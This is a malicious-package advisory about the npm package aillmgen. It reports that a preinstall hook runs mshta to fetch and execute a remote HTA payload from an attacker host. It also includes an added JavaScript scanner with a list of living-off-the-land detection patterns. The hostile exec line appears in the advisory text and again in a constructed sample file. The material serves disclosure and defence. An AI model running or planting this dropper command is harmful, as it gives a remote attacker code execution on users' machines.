MAL-2026-5927

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/aillmgen/MAL-2026-5927.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5927
Published
2026-06-16T22:09:54Z
Modified
2026-06-16T22:31:49.121604172Z
Summary
Malicious code in aillmgen (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341)

On npm install, the package's preinstall hook (preinstall.js) runs exec('cmd /c "mshta http://fixars.top"'), invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the privileges of the user running the install. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, so the payload can be changed at any time without republishing the package. The behavior is unrelated to the package's stated LLM-client purpose: the library code references an EasyLLMClient targeting api.easyllm.ai, while the package itself is published under the unrelated name aillmgen with empty author and description metadata. The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata marks this package as a supply-chain dropper.
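The mechanism above (a lifecycle hook in package.json that runs a script which shells out to a Windows LOLBin and a plain-HTTP URL) is exactly what a pre-install scan of an extracted tarball can catch. The following is an added example, not code from the advisory, the package, or OSV: it reads a package.json for install-time hooks, follows a "node file.js" hook to the referenced file, and flags LOLBin and plain-HTTP indicators in either place. The sample files are constructed to mirror the advisory's description; they are not the real package contents. The pattern list is a starting point, not a complete catalogue.

```javascript
// Added example (not from the advisory or the package): flag npm install
// hooks that invoke Windows living-off-the-land binaries or plain-HTTP URLs.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare', 'prepublish'];

// Indicators an LLM-client library has no business carrying in an install hook.
const LOLBIN_PATTERNS = [
  { name: 'mshta', re: /\bmshta(\.exe)?\b/i },
  { name: 'regsvr32', re: /\bregsvr32(\.exe)?\b/i },
  { name: 'rundll32', re: /\brundll32(\.exe)?\b/i },
  { name: 'certutil', re: /\bcertutil(\.exe)?\b/i },
  { name: 'powershell-encoded', re: /powershell[^\n]*\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}/i },
  { name: 'cmd-exec', re: /\bcmd(\.exe)?\s+\/c\b/i },
  { name: 'plain-http-url', re: /\bhttp:\/\/[^\s'")]+/i },
];

// Return the lifecycle hooks declared in a package.json string.
function findLifecycleHooks(packageJsonText) {
  const manifest = JSON.parse(packageJsonText);
  const scripts = manifest.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Names of every indicator pattern that matches the given text.
function scanForLolbins(text) {
  return LOLBIN_PATTERNS.filter(({ re }) => re.test(text)).map(({ name }) => name);
}

// files: map of path -> file contents, as obtained by extracting the tarball.
function assessPackage(files) {
  const hooks = findLifecycleHooks(files['package.json']);
  const findings = [];
  for (const { hook, command } of hooks) {
    // The hook command itself may carry the payload...
    for (const hit of scanForLolbins(command)) {
      findings.push({ hook, where: 'scripts.' + hook, indicator: hit });
    }
    // ...or it may just run a script file shipped in the package.
    const m = command.match(/\bnode\s+(\S+\.c?js)\b/);
    if (m && files[m[1]] !== undefined) {
      for (const hit of scanForLolbins(files[m[1]])) {
        findings.push({ hook, where: m[1], indicator: hit });
      }
    }
  }
  return { hooks, findings, suspicious: findings.length > 0 };
}

// Constructed sample modelled on the advisory's description (not the real files).
const SAMPLE_FILES = {
  'package.json': JSON.stringify({
    name: 'aillmgen', version: '4.0.2', author: '', description: '',
    scripts: { preinstall: 'node preinstall.js' },
  }),
  'preinstall.js':
    "const { exec } = require('child_process');\n" +
    "exec('cmd /c \"mshta http://fixars.top\"');\n",
};

console.log(JSON.stringify(assessPackage(SAMPLE_FILES), null, 2));
```

The preventive control is to not run lifecycle scripts at all on untrusted installs: `npm install --ignore-scripts`, or `ignore-scripts=true` in .npmrc for CI. Note that because the payload is fetched by mshta, a Linux-only CI run would never observe the network call; the scan above works on the package contents rather than on runtime behaviour.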

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006837",
            "import_time": "2026-06-16T22:17:36.229900342Z",
            "source": "amazon-inspector",
            "versions": [
                "4.0.2"
            ],
            "sha256": "5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341",
            "modified_time": "2026-06-16T22:09:54Z"
        }
    ]
}
References
Credits

Affected packages

Package: npm / aillmgen
Affected ranges: 4.*
Affected versions: 4.0.2

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/aillmgen/MAL-2026-5927.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "aillmgen-4.0.2.tgz",
            "hashes": {
                "sha1": "e558ff2c70c4434472e0f213073faf72c1accd8e",
                "sha512_sri": "sha512-/xoVe3G6bgDxVKZL0AzmWznijt4WejB7NioxzFLzY/toq/W7HnkE7/QljuglUa2M1nPu9RawnDh7ceULiijFnA=="
            }
        }
    ],
    "evidence_files": [
        {
            "path": "preinstall.js",
            "sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889",
            "tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd"
        },
        {
            "path": "package.json",
            "sha256": "8c76bc8aabe8bdbe6f4056c99588096e8cdf7a3d8b15cdbc0beb4d136f057966",
            "tlsh": "2ed02e388da3e93328c006620c2a9056b2e08f0f04143c0da3cf192c469e673b8ff31e"
        }
    ]
}